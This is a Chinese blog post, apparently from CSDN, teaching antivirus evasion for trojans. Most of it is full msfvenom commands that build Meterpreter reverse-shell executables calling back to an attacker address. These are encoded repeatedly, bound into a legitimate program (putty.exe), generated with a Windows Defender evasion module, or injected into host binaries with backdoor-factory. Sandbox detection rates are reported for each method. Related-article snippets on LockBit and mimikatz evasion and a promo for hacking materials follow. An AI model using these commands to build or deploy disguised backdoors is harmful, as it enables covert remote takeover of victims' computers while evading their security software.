2024最新最全【免杀技术】零基础入门到精通

最新推荐文章于 2024-01-07 10:33:03 发布
最新推荐文章于 2024-01-07 10:33:03 发布
阅读量1.1k 收藏 9
点赞数 32
文章标签: 网络 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shangguanliubei/article/details/135190881
版权

攻击机kali:192.168.1.11 靶机Windows7:192.168.1.18

1、自编码免杀
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe

开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用

微步沙箱检测结果,检出率近一半,效果一般

​​​

2、自捆绑免杀
    在生成payload时可以使用捆绑功能,使用msfvenom的 -x 参数可以指定一个自定义的可执行文件作为模板,并将payload嵌入其中,-x 后跟对应的文件路径即可。示例中已在当前文件夹下准备好了模板

msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -f exe -o shell2.exe

靶机运行木马成功反弹shell,木马可正常使用

微步检测结果,检出率近一半,效果一般

3、自捆绑+编码免杀
msfvenom -x putty.exe -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell3.exe

在靶机运行木马反弹shell成功

微步沙箱检测结果,免杀效果一般

4、多重编码+捆绑免杀
    msfvenom的encoder编码器可以对payload进行一定程度的免杀,同时还可以使用msfvenom多重编码功能,通过管道,让msfvenom用不同的编码器反复编码进行混淆。

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 lhost=192.168.1.11 lport=4444 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e cmd/powershell_base64 -a x86 --platform windows -x putty.exe -f exe -o shell4.exe

靶机运行木马反弹shell成功,免杀效果一般(免杀方式可多种方式混合使用)

5、evasion免杀
   2019年1月,metasploit升级为5.0,引入了一个新模块叫evasion模块,官方称这个模块可以创建反杀毒软件的木马

模块:windows/windows_defender_exe、windows/windows_defender_js_hta

msf6 exploit(multi/handler) > use windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > set filename shell5.exe
msf6 evasion(windows/windows_defender_exe) > set lhost 192.168.1.11
msf6 evasion(windows/windows_defender_exe) > set lport 4444
msf6 evasion(windows/windows_defender_exe) > run

靶机运行木马反弹shell成功,

6、backdoor factory
    backdoor-factory,又称后门工厂(BFD),BFD也是一款老牌的免杀神器,其作者曾经在2015年的blackhat大会上介绍过该工具,但是作者已经于2017年停止更新,免杀效果至今还算是不错。

检查宿主是否支持patch

python backdoor.py -f 程序路径 -S

-f:指定测试程序

-S:检查程序是否支持

查看宿主程序代码缝隙

python backdoor.py -f 程序路径 -c

-c:查看程序代码缝隙

获取该文件的可用payload

python backdoor.py -f 程序路径 -s show

-s:选择使用payload

指定payload、回连地址和端口、输出程序名、指定使用的代码缝隙

python backdoor.py -f 程序路径 -s 指定payload -J -H 回连地址 -P 回连端口 -o 输出程序名

-J:使用多代码缝隙注入

微步沙箱检测,免杀效果较好

生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 10 -f raw -o shellcode.c

注入shellcode

python backdoor.py -f 程序路径 -s 指定payload -U 指定shellcode -H 回连ip -P 回连端口 -o 输出程序名

:黑客&网络安全的SQL攻防

在这里领取:

在这里插入图片描述

这个是我花了几天几夜自整理的最新最全网安学习资料包免费共享给你们,其中包含以下东西:

1.学习路线&职业规划

在这里插入图片描述
在这里插入图片描述

2.全套体系课&入门到精通

在这里插入图片描述

3.黑客电子书&面试资料

在这里插入图片描述

程序员七海
关注
  • 32
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
恶意软件免杀技术(2022.03.25)
摔不死的笨鸟的博客
04-01 440
LockBit LOCKBIT检查进程控制块 (PEB)中的NtGlobalFlag字段,以检测是否正在调试恶意软件进程 使用FNV1A对每个名称(小写)进行哈希处理并与硬编码哈希进行比较,然后返回相应的 DLL 库 LockBit尝试通过修改自己的访问控制列表来限制对自己进程的访问 限制进程访问 调用GetSecurityInfo来检索进程的安全描述符 ACL 调用RtlAllocateAndInitializeSid为EVERYONE 组分配和初始化具有SECURITY_WORLD_SID_AUTHOR
恶意软件免杀技术(2022.05.05)
摔不死的笨鸟的博客
05-05 812
APT37攻击朝鲜记者 Fantasy会注入被XOR加密的payload,在数据结构中定义加密的XOR密钥,payload大小,加密的数据内容。 最终stage-GOLD-BACKDOOR和2021年8月Volexity披露的bluelight几乎吻合。 D:\Development\GOLD-BACKDOOR\Release\FirstBackdoor.pdb E:\Development\BACKDOOR\ncov\Release\bluelight.pdb GNU字符串工具可以看到嵌入在word中的l
bypass-av-note:免杀技术大杂烩---乱拳也打不死老师傅
03-31
免杀技术大杂烩---乱拳也打不死老师傅 作者:Boi @ Linton Lab 360 [目录] 左上角按钮可以看目录树 目前的反病毒安全软件,常见有三种,一种基于特征,一种基于行为,一种基于云查杀。 对特征突出,大多数杀毒软件会定义一个阈值,当文件内部的特征数量达到一定程度就会触发报警,也不排除杀软会针对某个EXP会限制特定的入口函数来查杀。当然还有通过md5,sha1等哈希函数来识别恶意软件,这也是最简单粗暴,最容易绕过的。编码/会增加查杀概率的单词(某些某函数称为ExecutePayloadshellcode),加密Shellcode等。 CreateThread CreateThreadEx xxx-> ntdll.dll-> win32API 对行为本身,很多个API可能会触发杀软的监控,进行初始化操作,添加启动项,添加服务,添加用户,注入,劫持,创建进程,加载DLL等。可
那些shellcode免杀总结
mingyqf的博客
03-24 7347
那些shellcode免杀总结 卿i(https://xz.aliyun.com/u/15540) / 2020-02-07 08:57:08 / 浏览数 20471 自己还是想把一些shellcode免杀的技巧通过白话文、傻瓜式的文章把技巧讲清楚。希望更多和我一样web狗也能动手做到免杀的实现。 文中我将shellcode免杀技巧分为 "分离“、”混淆“两个大类,通过不同技巧针对不同检测方式,也就是常听到的特征检测、行
通过xencrypt免杀invoke-mimikatz.ps1
网络安全。
03-03 1559
0x01 简介 xencrypt目前测试只在windows 2012 powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。 0x02 使用 1、下载invoke-mimikatz.ps1到同级目录下。 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exf...
Mimikatz的18种免杀姿势及防御策略
Xor0ne
05-01 7082
PS:建议 :win10慎用,唉,伤心 然后按照里面的的步骤一步步去执行,有很多错误,所以如果您只是看技巧的话,可以去原文查看哦。或者读的时候略过我的错误部分啦。>_< 免杀介绍中方法【1-10】转载于自于: Mimikatz的18种免杀姿势及防御策略(上) 文章目录0x01前言0x02免杀介绍方法0-原生态mimikatz.exe(VT查杀率55/71)方法1-加壳+签名+资源替换(...
远控免杀入门到实践(6)-代码篇-Powershell
weixin_46236101的博客
03-13 1052
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀入门到实践》系列文章目录: 1、远控免杀入门到实践 (1)基础篇 2、远控免杀入门到实践 (2)工具总结篇 3、远控免杀入门到实践 (3)代码篇-C/C++ 4、远控免杀入门到实践 (4)代码篇-C# 5、远控免杀入门到实践 (5)代码篇-Python 6、远控免杀入门到实践 (6)代码篇-Powershell 7、远控免杀入门到实.
远控免杀入门到实践(2)工具总结篇
weixin_46236101的博客
03-13 2381
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀入门到实践》系列文章目录: 1、远控免杀入门到实践 (1)基础篇 2、远控免杀入门到实践 (2)工具总结篇 3、远控免杀入门到实践 (3)代码篇-C/C++ 4、远控免杀入门到实践 (4)代码篇-C# 5、远控免杀入门到实践 (5)代码篇-Python 6、远控免杀入门到实践 (6)代码篇-Powershell 7、远控免杀入门到实.
2023年最强手机远程控制横测:ToDesk、向日葵、Airdroid三款APP免Root版本
热门推荐
陈橘又青的博客
04-10 3万+
随着远程办公和远程协作的日益普及,跨设备、系统互通的远程控制软件已经成为职场人士不可或缺的工具之一。在国内,向日葵和ToDesk是最著名的远程控制软件;而在国外,则有微软远程桌面、AirDroid、TeamViewer、AnyDesk、Parsec等多个选择。
红蓝对抗经验分享:CS免杀姿势
m0_59598029的博客
09-13 394
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。赛门铁克也未报毒,其它杀软不放图了。但是需要注意的是别使用云沙箱检测。多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。
最新版C++从零基础精通课程-网盘链接提取码下载 .txt
02-17
本专题主要讲解C++基础入门学习,涉及很深入的语法和机制。让你整体多面的了解和学习C++的核心内容,快速学习使用C++,我们的目标是先宏观整体把握,在深入各个击破!学完此套课程,可以达到一个C++中高级开发者的...
Java零基础教程视频_从入门精通
07-22
资源名称:Java零基础教程视频_从入门精通资源目录:【】000_Java零基础视频教程__讲义【】000_Java零基础视频教程__课堂笔记【】001_Java零基础视频教程__安装EditPlus【】002_Java零基础视频教程__计算机概述...
ps自学零基础入门精通
03-21
ps自学零基础入门精通最好的PS教程视频 百度网盘链接下载
零基础Python爬虫从入门精通-视频教程网盘链接提取码下载 .txt
02-21
本套视频教程适合想掌握爬虫技术的学习者,以企业主流版本Python 3.7来讲解,内容包括:Python基础、Urllib、解析(xpath、jsonpath、beautiful)、requests、selenium、Scrapy框架等。针对零基础的同学可以从头学起...
最新Java零基础入门精通300集
07-07
最新Java零基础入门精通300集,IDEA&Git入门精通【马士兵教育】
【转】免杀基础 -免杀技术及原理
tpriwwq的专栏
05-03 2016
免杀的最基本思路就是去除其特征,这个特征有可能是特征码,也有可能是行为特征,只要在不修改其原有功能的情况下,破坏了病毒与木马所固有的特征,一次免杀就能完成。
我的powershell免杀之路
mingyqf的博客
05-17 1881
我的powershell免杀之路 ​ 原创 tubai
【黑客免杀攻防】读书笔记1 - 初级免杀基础理论(反病毒软件特征码提取介绍、免杀原理、壳)...
weixin_30642869的博客
06-14 479
在52pojie发表《xxxx》病毒查杀的帖子后,感谢论坛里的会员GleamJ牛不但指出我文章后所添加服务名字符串作为特征码方式的不足,还分享了他工作中4种提取特征码的方法。让我更加觉得要加紧时间学习,这样才不会被大牛甩得太远。弄清楚基本概念,以后吹水不致被嫌弃得太惨。嘿嘿! 基础篇 初级免杀技术 第1章 变脸 免杀是一种反杀毒技术。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能...
2024前端炫酷源码分享(附效果图及在线演示)
qq_50594742的博客
01-07 736
分享10款非常有趣的前端特效源码 其中包含css动画特效、js原生特效、svg特效以及小游戏等 下面我会给出特效样式图或演示效果图 但你也可以点击在线预览查看源码的最终展示效果及下载源码资源。
unity3d零基础入门精通教程网盘
最新发布
01-08
对于想要学习Unity3D的零基础入门者来说,有很多途径可以获取相关教程资源。其中,网盘是一个非常方便的选择。在网盘上可以找到大量的Unity3D教程资源,从入门精通的学习材料应有尽有。 首先,我们可以搜索各大教育平台或论坛中与Unity3D相关的网盘资源,如百度云盘、蓝奏云盘等。在这些网盘中,可以找到Unity3D官方教程、各类入门教程、视频教程以及示例项目等。这些资源从零基础入门到进阶深入,都提供了详实的学习内容和示例,帮助学习者逐步掌握Unity3D的基本操作和应用。 此外,还可以加入Unity3D学习交流社群,如Unity官方论坛、CSDN的Unity社区等,这些社群中的会员经常进行资源共享和教程推荐。在其中也可以找到一些Unity3D教程资源的网盘链接。另外,还有一些Unity3D培训机构或个人在网盘上分享了自己制作的教学视频或文档,这些资源可以帮助学习者更好地理解和掌握Unity3D的各种技术。 最后,建议学习者在下载网盘资源时,要注意资源的可靠性和合法性。选择来源可信的网盘资源,避免下载盗版或非法教程。此外,在学习过程中还需要充分利用官方文档、论坛资源以及在线的视频教程,多方面的学习和实践才能帮助零基础的学习者快速入门并逐步精通Unity3D。 总之,Unity3D的零基础入门精通的教程资源在网盘上是丰富多样的。学习者可以通过搜索各类教育平台或论坛中的资源分享,加入学习交流社群,获取大量的教程视频、文档和示例项目,从而逐步掌握Unity3D的技术和应用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

程序员七海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值